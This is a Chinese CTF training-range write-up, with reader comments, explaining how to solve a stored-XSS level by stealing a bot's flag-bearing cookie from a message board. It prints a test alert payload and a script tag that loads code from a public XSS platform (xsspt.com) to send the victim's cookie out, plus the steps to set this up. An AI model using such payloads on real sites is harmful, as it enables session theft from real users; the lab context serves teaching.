靶场第四关解题思路--Xss跨站脚本攻击[靶场:为了更多的权限!留言板]
PPT、课程直播、回放已打包至附件!
直播回放观看:https://ke.qq.com/webcourse/index.html#course_id=275794&term_id=100326238&taid=2183183416440146&vid=y1425jbjoe7
通过对Tips的读取我们明白了这题是一道存储型XSS偷取cookie的题目。(因为flag在cookie中,XSS BOT每10秒就带着有flag的cookie去访问查看留言的页面)
既然是存储型XSS,那么我们先用弹窗去尝试(如果不明白为什么弹窗尝试的话建议先去看我们的直播回放),那么就开始插入<script>alert('zkaq')</script>
为了保险起见我们在所有能输入的地方都写了<script>alert('zkaq')</script>,然后提交留言
成功的弹窗了
因为XSS Payload的强大,也是为了使用的方便,有安全研究者将许多功能封装了起来做成了XSS平台。也是因为插入点一般都有长度限制,所以说xss一般攻击都需要外链。我在这里演示用的是网上的xss平台:http://xsspt.com,需要自己去注册和登录,反正账号密码知道就行了,邮箱反正不验证不建议写真实的。
我们先建立项目,名称什么乱选都行,就是选择模块的时候记得选取这两个
然后你可以看到一叠代码,这个就是两个模块中的XSS Payload,现在你们能够理解为什么要XSS平台了吧,我们用滚轮拖到最下面
<script src=http://xsspt.com/APo4Kj?1526636210></script>
复制下来然后按完成,然后出现项目A 内容0 ,这是因为XSS平台没有收到cookie的缘故,然后回到靶场我们把复制下的这句话插入主题然后提交(我们的插入并不是F12修改源码,而是通过留言板的留言来让网页自动加载出我们插入的恶意语句,因为我们的恶意语句无法显示,有的时候无法看出是否成功插入,所以f12审查源码,看一看是否成功插入)
没显示说明是执行了我插入的语句。然后教你们一个小技巧,在谷歌浏览器可以选择到Sources,然后就可以看到了网页加载了xsspt.com说明XSS成功
然后返回XSS平台看到了有内容了。点击内容名称。
然后展开每一个看看,成功获取了flag
打赏我,让我更有动力~
返回首页
CTF&WP专版
基恩
发表于 2020-4-11
开始收到的cookie中没有flag,后来点击项目进行刷新,刷新后flag就出现了。相同情况的姐妹们参考。
评论列表
加载数据中...
vonsr
发表于 2020-5-26
flag不对
评论列表
加载数据中...
cxlya
发表于 2020-8-20
这关我xss平台一直没接收到flag后面那几关根本没法玩
评论列表
加载数据中...
cxlya
发表于 2020-8-20
这关我xss平台一直没接收到flag后面那几关根本没法玩
评论列表
加载数据中...
菜包子
发表于 2020-12-24
没有管理员登录啊,获取不到flag
评论列表
加载数据中...
菜包子
发表于 2020-12-24
我拿到cookie为什么进入不了管理员后台
评论列表
加载数据中...
路yeah
发表于 2021-2-6
呜呜,第三题flag在哪,死活找不到
评论列表
加载数据中...
hacktot
发表于 2021-4-4
没有Flag zenm 回事
评论列表
加载数据中...
hacker0
发表于 2021-5-5
为啥不能留言了呢?靶场里面
评论列表
加载数据中...
songyu
发表于 11个月前
没有flag。。。
评论列表
加载数据中...
漓沐
发表于 9个月前
没有flag怎么玩?
评论列表
加载数据中...
eiu1110
发表于 9个月前
flag不对的,填flag的时候不要把‘flag=’也当成flag填进去了
评论列表
加载数据中...
漓沐
发表于 9个月前
我那里出错了?没有flag玩什么
评论列表
加载数据中...
3429567225
发表于 9个月前
为什么我收到的cookie里没有flog
评论列表
加载数据中...
1927251229
发表于 9个月前
没有flag
评论列表
加载数据中...
fengjingyyds
发表于 8个月前
为甚没有flag
评论列表
加载数据中...
nuocheng
发表于 8个月前
提交哪个
评论列表
加载数据中...
xiaozhang1314
发表于 5个月前
为什么现在只能获取到自己的Cookie,flag也不见了,我人麻了
评论列表
加载数据中...
utmost
发表于 11天前
一直没有含flag的cookie,
评论列表
加载数据中...